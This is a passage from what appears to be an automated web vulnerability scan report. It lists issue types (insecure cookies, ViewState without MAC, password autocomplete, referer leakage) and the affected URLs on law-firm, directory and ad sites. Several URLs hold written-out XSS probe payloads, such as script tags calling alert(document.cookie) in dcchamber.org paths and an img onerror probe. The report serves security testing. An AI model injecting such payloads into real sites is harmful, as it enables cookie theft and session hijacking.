5.13. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.14. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.15. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.16. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

5.17. http://www.vault.com/wps/portal/usa/rankings/individual

5.18. http://www.vault.com/wps/portal/usa/rankings/individual

5.19. http://www.vault.com/wps/portal/usa/rankings/individual

6. Session token in URL

7. Password field submitted using GET method

7.1. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

7.2. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

7.3. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

7.4. http://www.local.com/results.aspx

7.5. http://www.vault.com/wps/portal/usa/rankings/individual

8. ASP.NET ViewState without MAC enabled

8.1. http://www.cov.com/

8.2. http://www.cov.com/en-US/regions/middle_east/

8.3. http://www.cov.com/favicon.ico

8.4. http://www.cov.com/health_care/health_care_reform/

8.5. http://www.cov.com/industry/financial_services/dodd_frank/

8.6. http://www.cov.com/ja-JP/practice/region.aspx

8.7. http://www.cov.com/ko-KR/practice/region.aspx

8.8. http://www.cov.com/news/detail.aspx

8.9. http://www.cov.com/practice/

8.10. http://www.cov.com/zh-CN/practice/region.aspx

9. Cookie scoped to parent domain

9.1. http://wsdsapi.infospace.com/infomaster/widgets

9.2. http://www.fulbright.com/dc

9.3. http://b.scorecardresearch.com/b

9.4. http://d7.zedo.com/OzoDB/cutils/R52_5/jsc/933/egc.js

9.5. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

9.6. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

9.7. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

9.8. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

9.9. http://d7.zedo.com/img/bh.gif

9.10. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json

9.11. http://js.revsci.net/gateway/gw.js

9.12. http://landesm.gfi.com/event-log-analysis-sm/

9.13. https://login.yahoo.com/config/login

9.14. http://lt.navegg.com/g.lt

9.15. http://www.fulbright.com/Austin

9.16. http://www.fulbright.com/Denver

9.17. http://www.fulbright.com/London

9.18. http://www.fulbright.com/LosAngeles

9.19. http://www.fulbright.com/Minneapolis

9.20. http://www.fulbright.com/Riyadh

9.21. http://www.fulbright.com/aboutus

9.22. http://www.fulbright.com/alumni

9.23. http://www.fulbright.com/aop

9.24. http://www.fulbright.com/careers

9.25. http://www.fulbright.com/dc/x22

9.26. http://www.fulbright.com/downloads

9.27. http://www.fulbright.com/dubai

9.28. http://www.fulbright.com/favicon.ico

9.29. http://www.fulbright.com/index.cfm

9.30. http://www.fulbright.com/industries

9.31. http://www.fulbright.com/insite

9.32. http://www.fulbright.com/international

9.33. http://www.fulbright.com/jblount

9.34. http://www.fulbright.com/news/act_ticker_xml.cfm

9.35. http://www.fulbright.com/newsTicker.swf

9.36. http://www.fulbright.com/offices

9.37. http://www.fulbright.com/rss

9.38. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

9.39. http://www.fulbright.com/technology

9.40. http://www.info.com/washington%20dc%20law%20firms

9.41. http://www.local.com/results.aspx

9.42. http://www.yellowpages.com/Washington-DC/Attorneys

10. Cookie without HttpOnly flag set

10.1. http://web2.domainmall.com/domainserve/domainView

10.2. http://wsdsapi.infospace.com/infomaster/widgets

10.3. http://www.arnoldporter.com/

10.4. http://www.dcchamber.org/chamber/memberDetail.asp

10.5. http://www.ebglaw.com/showoffice.aspx

10.6. http://www.fulbright.com/

10.7. http://www.fulbright.com/dc

10.8. http://www.fulbright.com/index.cfm

10.9. http://www.kasimer-ittig.com/

10.10. http://www.political.cov.com/

10.11. http://www.vault.com/wps/portal/usa/rankings/individual

10.12. http://www.wileyrein.com/

10.13. http://ads.roiserver.com/cf

10.14. http://ads.roiserver.com/click

10.15. http://b.scorecardresearch.com/b

10.16. http://d7.zedo.com/OzoDB/cutils/R52_5/jsc/933/egc.js

10.17. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

10.18. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

10.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

10.20. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

10.21. http://d7.zedo.com/img/bh.gif

10.22. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json

10.23. http://jonesdaydiversity.com/

10.24. http://jonesdaydiversity.com/404.aspx

10.25. http://jonesdaydiversity.com/favicon.ico

10.26. http://js.revsci.net/gateway/gw.js

10.27. http://landesm.gfi.com/event-log-analysis-sm/

10.28. https://login.yahoo.com/config/login

10.29. http://lt.navegg.com/g.lt

10.30. http://skaddenpractices.skadden.com/fca/

10.31. http://skaddenpractices.skadden.com/hc/

10.32. http://skaddenpractices.skadden.com/sec/

10.33. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

10.34. http://www.addthis.com/bookmark.php

10.35. http://www.cov.com/

10.36. http://www.cov.com/en-US/regions/middle_east/

10.37. http://www.cov.com/favicon.ico

10.38. http://www.cov.com/health_care/health_care_reform/

10.39. http://www.cov.com/industry/financial_services/dodd_frank/

10.40. http://www.cov.com/ja-JP/practice/region.aspx

10.41. http://www.cov.com/ko-KR/practice/region.aspx

10.42. http://www.cov.com/news/detail.aspx

10.43. http://www.cov.com/practice/

10.44. http://www.cov.com/zh-CN/practice/region.aspx

10.45. http://www.fulbright.com/Austin

10.46. http://www.fulbright.com/Beijing

10.47. http://www.fulbright.com/Dallas

10.48. http://www.fulbright.com/Denver

10.49. http://www.fulbright.com/FAA_adv

10.50. http://www.fulbright.com/HongKong

10.51. http://www.fulbright.com/London

10.52. http://www.fulbright.com/LosAngeles

10.53. http://www.fulbright.com/Minneapolis

10.54. http://www.fulbright.com/Munich

10.55. http://www.fulbright.com/Riyadh

10.56. http://www.fulbright.com/SanAntonio

10.57. http://www.fulbright.com/StLouis

10.58. http://www.fulbright.com/aboutus

10.59. http://www.fulbright.com/alumni

10.60. http://www.fulbright.com/aop

10.61. http://www.fulbright.com/careers

10.62. http://www.fulbright.com/dc/x22

10.63. http://www.fulbright.com/downloads

10.64. http://www.fulbright.com/dubai

10.65. http://www.fulbright.com/favicon.ico

10.66. http://www.fulbright.com/houston

10.67. http://www.fulbright.com/industries

10.68. http://www.fulbright.com/insite

10.69. http://www.fulbright.com/international

10.70. http://www.fulbright.com/jblount

10.71. http://www.fulbright.com/languages

10.72. http://www.fulbright.com/news/act_ticker_xml.cfm

10.73. http://www.fulbright.com/newsTicker.swf

10.74. http://www.fulbright.com/newyork

10.75. http://www.fulbright.com/offices

10.76. http://www.fulbright.com/rss

10.77. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

10.78. http://www.fulbright.com/technology

10.79. http://www.hoganlovells.com/

10.80. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/

10.81. http://www.hoganlovells.com/FCWSite/HoganHartsonWS/HHWebServices.asmx

10.82. http://www.hoganlovells.com/FCWSite/Include/AttorneyTypeAhead.js

10.83. http://www.hoganlovells.com/FCWSite/Include/careers.css

10.84. http://www.hoganlovells.com/FCWSite/Include/incFlashDetect.js

10.85. http://www.hoganlovells.com/FCWSite/Include/jquery-1.3.2.min.js

10.86. http://www.hoganlovells.com/FCWSite/Include/jquery-ui-1.7.2.min.js

10.87. http://www.hoganlovells.com/FCWSite/Include/jquery-ui-datepicker.min.js

10.88. http://www.hoganlovells.com/FCWSite/Include/menu/fr/mouseover.js

10.89. http://www.hoganlovells.com/FCWSite/Include/menu/ja/mouseover.js

10.90. http://www.hoganlovells.com/FCWSite/Include/menu/mouseover.js

10.91. http://www.hoganlovells.com/FCWSite/Include/menu/zh/mouseover.js

10.92. http://www.hoganlovells.com/FCWSite/Include/merger/AC_RunActiveContent.js

10.93. http://www.hoganlovells.com/FCWSite/Include/merger/BrowserSpecifics.js

10.94. http://www.hoganlovells.com/FCWSite/Include/merger/general.css

10.95. http://www.hoganlovells.com/FCWSite/Include/merger/home.css

10.96. http://www.hoganlovells.com/FCWSite/Include/merger/menu.css

10.97. http://www.hoganlovells.com/FCWSite/Include/merger/print.css

10.98. http://www.hoganlovells.com/FCWSite/Include/spamproof.js

10.99. http://www.hoganlovells.com/WebResource.axd

10.100. http://www.hoganlovells.com/aboutus/history/

10.101. http://www.hoganlovells.com/aboutus/overview/

10.102. http://www.hoganlovells.com/de/

10.103. http://www.hoganlovells.com/es/

10.104. http://www.hoganlovells.com/fr/

10.105. http://www.hoganlovells.com/include/hoganConfig.xml

10.106. http://www.hoganlovells.com/include_common/NetInsight/ntpagetag.js

10.107. http://www.hoganlovells.com/include_common/YUI/colorpicker-min.js

10.108. http://www.hoganlovells.com/include_common/YUI/container-min.js

10.109. http://www.hoganlovells.com/include_common/YUI/slider-min.js

10.110. http://www.hoganlovells.com/include_common/YUI/utilities.js

10.111. http://www.hoganlovells.com/include_common/tool-man/tool-man-min.js

10.112. http://www.hoganlovells.com/industries/

10.113. http://www.hoganlovells.com/ja/

10.114. http://www.hoganlovells.com/newsmedia/awardsrankings/

10.115. http://www.hoganlovells.com/newsmedia/fastfacts/

10.116. http://www.hoganlovells.com/newsmedia/newspubs/

10.117. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx

10.118. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

10.119. http://www.hoganlovells.com/newsmedia/timeline/

10.120. http://www.hoganlovells.com/offices/

10.121. http://www.hoganlovells.com/ourpeople/

10.122. http://www.hoganlovells.com/ourpeople/List.aspx

10.123. http://www.hoganlovells.com/practiceAreas/area.aspx

10.124. http://www.hoganlovells.com/practiceareas/

10.125. http://www.hoganlovells.com/ru/

10.126. http://www.hoganlovells.com/splash/alumni/

10.127. http://www.hoganlovells.com/zh-CHS/

10.128. http://www.info.com/washington%20dc%20law%20firms

10.129. http://www.jonesdaydiversity.com/

10.130. http://www.local.com/results.aspx

10.131. http://www.skadden.com/2011insights.cfm

10.132. http://www.skadden.com/alumni/Index.cfm

10.133. http://www.skadden.com/index.cfm

10.134. http://www.vault.com/com.vault.home.portlets/homeflash802010.xml

10.135. http://www.vault.com/com.vault.home.portlets/homepage_flash.swf

10.136. http://www.vault.com/favicon.ico

10.137. http://www.vault.com/images/arrow-right-middle.gif

10.138. http://www.vault.com/images/backgrounds/blue_gradient_reviews.jpg

10.139. http://www.vault.com/images/backgrounds/footer_background.jpg

10.140. http://www.vault.com/images/backgrounds/header-gray.jpg

10.141. http://www.vault.com/images/blogs/photo-small-1260.jpg

10.142. http://www.vault.com/images/dotted_separator.gif

10.143. http://www.vault.com/images/employer_section_header.jpg

10.144. http://www.vault.com/images/favicon.ico

10.145. http://www.vault.com/images/header_background.jpg

10.146. http://www.vault.com/images/home/icon-resume.png

10.147. http://www.vault.com/images/home/no_flash.jpg

10.148. http://www.vault.com/images/homepageFlash/01newjob.jpg

10.149. http://www.vault.com/images/homepageFlash/02reshelp.jpg

10.150. http://www.vault.com/images/homepageFlash/03gradhelp.jpg

10.151. http://www.vault.com/images/homepageFlash/04coreviews.jpg

10.152. http://www.vault.com/images/homepageFlash/05college.jpg

10.153. http://www.vault.com/images/homepageFlash/06salary.jpg

10.154. http://www.vault.com/images/homepageFlash/07careerchange.jpg

10.155. http://www.vault.com/images/homepageFlash/08comm.jpg

10.156. http://www.vault.com/images/homepageFlash/cadvancement.jpg

10.157. http://www.vault.com/images/icons/business-people.jpg

10.158. http://www.vault.com/images/icons/cart-green.gif

10.159. http://www.vault.com/images/icons/checkbox.gif

10.160. http://www.vault.com/images/icons/email-y.png

10.161. http://www.vault.com/images/icons/email.png

10.162. http://www.vault.com/images/icons/featured_company_left_arrow_inactive.gif

10.163. http://www.vault.com/images/icons/featured_company_right_arrow_active.gif

10.164. http://www.vault.com/images/icons/gold-lock2.jpg

10.165. http://www.vault.com/images/icons/join-books.png

10.166. http://www.vault.com/images/icons/print-y.png

10.167. http://www.vault.com/images/icons/print.png

10.168. http://www.vault.com/images/icons/share-y.png

10.169. http://www.vault.com/images/icons/share.png

10.170. http://www.vault.com/images/overlay.png

10.171. http://www.vault.com/images/rankings_tab.jpg

10.172. http://www.vault.com/images/search/select-bg.gif

10.173. http://www.vault.com/images/sections_background.jpg

10.174. http://www.vault.com/images/spacer.gif

10.175. http://www.vault.com/images/sponsors/schools/sponsor_1088.gif

10.176. http://www.vault.com/images/sponsors/schools/sponsor_1398.gif

10.177. http://www.vault.com/images/sponsors/schools/sponsor_1727.gif

10.178. http://www.vault.com/images/sponsors/schools/sponsor_2105.gif

10.179. http://www.vault.com/images/sponsors/schools/sponsor_2282.gif

10.180. http://www.vault.com/images/sponsors/schools/sponsor_2492.gif

10.181. http://www.vault.com/images/sponsors/schools/sponsor_251.gif

10.182. http://www.vault.com/images/sponsors/schools/sponsor_2983.gif

10.183. http://www.vault.com/images/sponsors/schools/sponsor_3276.gif

10.184. http://www.vault.com/images/sponsors/schools/sponsor_3672.gif

10.185. http://www.vault.com/images/sponsors/schools/sponsor_507.gif

10.186. http://www.vault.com/images/sponsors/schools/sponsor_517.gif

10.187. http://www.vault.com/images/sponsors/schools/sponsor_790.gif

10.188. http://www.vault.com/images/sponsors/sponsor_1026.gif

10.189. http://www.vault.com/images/sponsors/sponsor_10358.gif

10.190. http://www.vault.com/images/sponsors/sponsor_10404.gif

10.191. http://www.vault.com/images/sponsors/sponsor_1815.gif

10.192. http://www.vault.com/images/sponsors/sponsor_25318.gif

10.193. http://www.vault.com/images/sponsors/sponsor_377.gif

10.194. http://www.vault.com/images/sponsors/sponsor_385.gif

10.195. http://www.vault.com/images/sponsors/sponsor_43868.gif

10.196. http://www.vault.com/images/sponsors/sponsor_569724.gif

10.197. http://www.vault.com/images/sponsors/sponsor_6100.gif

10.198. http://www.vault.com/images/sponsors/sponsor_6603.gif

10.199. http://www.vault.com/images/sponsors/sponsor_7285.gif

10.200. http://www.vault.com/images/sponsors/sponsor_819.gif

10.201. http://www.vault.com/images/sponsors/sponsor_906.gif

10.202. http://www.vault.com/images/sponsors/sponsor_9066.gif

10.203. http://www.vault.com/images/sponsors/sponsor_923.gif

10.204. http://www.vault.com/images/store/covers/626-small.gif

10.205. http://www.vault.com/images/store/covers/759-small.gif

10.206. http://www.vault.com/images/store/covers/888-small.gif

10.207. http://www.vault.com/images/subheader_background2.jpg

10.208. http://www.vault.com/images/subheader_bottom2.jpg

10.209. http://www.vault.com/images/subheader_top3.jpg

10.210. http://www.vault.com/images/vault_logo_new.jpg

10.211. http://www.vault.com/scripts/Tools.js

10.212. http://www.vault.com/scripts/jquery-1.3.2.min.js

10.213. http://www.vault.com/scripts/jquery.DOMWindow.js

10.214. http://www.vault.com/scripts/jquery.autocomplete.js

10.215. http://www.vault.com/scripts/jquery.carousel.js

10.216. http://www.vault.com/scripts/jquery.popupWindow.js

10.217. http://www.vault.com/scripts/jquery.stylish-select.js

10.218. http://www.vault.com/scripts/jquery.swapimage.min.js

10.219. http://www.vault.com/scripts/main.js

10.220. http://www.vault.com/scripts/membership.js

10.221. http://www.vault.com/scripts/swfobject.js

10.222. http://www.vault.com/scripts/time-tracker.js

10.223. http://www.vault.com/scripts/vault_header.js

10.224. http://www.vault.com/styles/buttons.css

10.225. http://www.vault.com/styles/home.css

10.226. http://www.vault.com/styles/jquery.autocomplete.css

10.227. http://www.vault.com/styles/law-rankings.css

10.228. http://www.vault.com/styles/login.css

10.229. http://www.vault.com/styles/main.css

10.230. http://www.vault.com/styles/membership.css

10.231. http://www.vault.com/styles/polls.css

10.232. http://www.vault.com/styles/print.css

10.233. http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9EQVM4ZjQ4NzUwMDAxLzI3MDgxMi9saQ!!/

10.234. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

10.235. http://www.weil.com/

10.236. http://www.yellowpages.com/Washington-DC/Attorneys

10.237. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

11. Password field with autocomplete enabled

11.1. http://dcregistry.com/wbn/welcome.html

11.2. http://dcregistry.com/wbn/welcome.html

11.3. https://immigration.ebglaw.com/TrkrSSL.html

11.4. https://login.yahoo.com/config/login

11.5. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

11.6. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

11.7. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

11.8. http://www.fulbright.com/

11.9. http://www.fulbright.com/index.cfm

11.10. http://www.fulbright.com/insite

11.11. http://www.fulbright.com/insite

11.12. http://www.local.com/results.aspx

11.13. http://www.local.com/results.aspx

11.14. http://www.political.cov.com/

11.15. http://www.skadden.com/alumni/Index.cfm

11.16. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

11.17. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

11.18. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

11.19. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

11.20. http://www.vault.com/wps/portal/usa/rankings/individual

11.21. http://www.vault.com/wps/portal/usa/rankings/individual

11.22. http://www.vault.com/wps/portal/usa/rankings/individual

11.23. http://www.vault.com/wps/portal/usa/rankings/individual

11.24. http://www.vault.com/wps/portal/usa/rankings/individual

12. Source code disclosure

12.1. http://www.addthis.com/bookmark.php

12.2. http://www.local.com/business/v3/js/globalbusiness_3_5.js

13. Cross-domain POST

14. SSL cookie without secure flag set

15. Cross-domain Referer leakage

15.1. http://ads.bluelithium.com/st

15.2. http://ads.roiserver.com/disp

15.3. http://ads.roiserver.com/disp

15.4. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

15.5. http://dcregistry.com/cgi-bin/classifieds/classifieds.cgi

15.6. http://dcregistry.com/cgi-bin/surveys/survey.cgi

15.7. http://financaspessoais.blog.br/

15.8. http://financaspessoais.blog.br/financenetwork/

15.9. http://gc.blog.br/

15.10. http://landesm.gfi.com/event-log-analysis-sm/

15.11. https://login.yahoo.com/config/login

15.12. http://rafael.adm.br/

15.13. http://skaddenpractices.skadden.com/sec/index.php

15.14. http://web2.domainmall.com/domainserve/domainView

15.15. http://www.arnoldporter.com/events.cfm

15.16. http://www.arnoldporter.com/multimedia.cfm

15.17. http://www.arnoldporter.com/publications.cfm

15.18. http://www.dcchamber.org/chamber/memberDetail.asp

15.19. http://www.dcregistry.com/cgi-bin/calendar/calendar.cgi

15.20. http://www.dcregistry.com/cgi-bin/classifieds/classifieds.cgi

15.21. http://www.ebglaw.com/showoffice.aspx

15.22. http://www.fulbright.com/index.cfm

15.23. http://www.fulbright.com/index.cfm

15.24. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

15.25. http://www.hoganlovells.com/practiceAreas/area.aspx

15.26. http://www.info.com/washington%20dc%20law%20firms

15.27. http://www.kasimer-ittig.com/

15.28. http://www.local.com/business/v3/js/globalbusiness_3_5.js

15.29. http://www.local.com/dart/

15.30. http://www.local.com/dart/

15.31. http://www.local.com/dart/

15.32. http://www.local.com/dart/

15.33. http://www.local.com/dart/

15.34. http://www.local.com/dart/

15.35. http://www.local.com/dart/

15.36. http://www.local.com/results.aspx

15.37. http://www.skadden.com/2011insights.cfm

15.38. http://www.skadden.com/alumni/Index.cfm

15.39. http://www.skadden.com/index.cfm

15.40. http://www.usdirectory.com/gypr.aspx

15.41. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

15.42. http://www.vault.com/wps/portal/usa/rankings/individual

16. Cross-domain script include

16.1. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

16.2. http://financaspessoais.blog.br/

16.3. http://financaspessoais.blog.br/wp-content/themes/freshnews/styles/tweete-ganhe.css

16.4. http://flowplayer.org/tools/

16.5. http://gc.blog.br/

16.6. http://landesm.gfi.com/event-log-analysis-sm/

16.7. https://login.yahoo.com/config/login

16.8. https://login.yahoo.com/config/login

16.9. http://medienfreunde.com/lab/innerfade/

16.10. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

16.11. http://rafael.adm.br/

16.12. http://rafael.adm.br/favicon.ico

16.13. http://rafael.adm.br/feed/podcast/

16.14. http://rafael.adm.br/p/bootstrapping-de-aplicacoes-web-no-ceara-on-rails-2009/

16.15. http://rafael.adm.br/p/definicao-de-metas-e-prioridades/

16.16. http://rafael.adm.br/p/empretec-eu-fiz/

16.17. http://rafael.adm.br/p/galera-no-edted/

16.18. http://rafael.adm.br/p/oxente-rails-2010/

16.19. http://rafael.adm.br/p/programador-lento/

16.20. http://rafael.adm.br/p/suas-metas-devem-ser-smart/

16.21. http://twittercounter.com/rafaelp

16.22. http://web2.domainmall.com/domainserve/domainView

16.23. http://www.addthis.com/bookmark.php

16.24. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

16.25. http://www.dcchamber.org/chamber/memberDetail.asp

16.26. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg

16.27. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG

16.28. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG

16.29. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG

16.30. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG

16.31. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG

16.32. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png

16.33. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG

16.34. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG

16.35. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png

16.36. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG

16.37. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG

16.38. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG

16.39. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG

16.40. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG

16.41. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG

16.42. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif

16.43. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG

16.44. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG

16.45. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG

16.46. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG

16.47. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png

16.48. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG

16.49. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG

16.50. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG

16.51. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG

16.52. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png

